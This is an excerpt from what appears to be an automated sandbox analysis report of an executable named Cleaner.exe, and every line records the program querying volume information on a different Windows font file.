Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
